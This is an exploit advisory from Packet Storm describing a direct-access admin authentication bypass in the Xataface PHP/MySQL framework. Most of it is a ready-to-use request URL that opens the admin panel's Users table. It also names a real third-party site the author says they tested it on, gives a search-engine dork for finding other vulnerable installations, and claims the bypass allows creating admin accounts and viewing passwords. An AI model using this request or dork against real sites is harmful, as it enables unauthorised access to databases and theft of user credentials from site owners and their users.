Xataface suffers from a direct access administrative bypass vulnerability.
8576077ddcd5bbad12a1e239893220b5ee9df452d1d64d4ab7e63fe3aca17f15
=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site : firewire-security.com
#[+] Email : admin@firewire-security.com
=======================================================
=======================================================
#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software : Xataface - open source GPL, PHP, Mysql database
software
#[+] Vendor : http://xataface.com
#[+] Usage :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list
#[+] Tested on :
http://www.journeytherapeut.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list
#[+] Alert : Most of the sites i tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork :"powered by dataface" "powered by xataface"
#[+] Description : With this i could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.
#[+] Greetz :firewire-security team, b10h4z4rd, g3org3
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed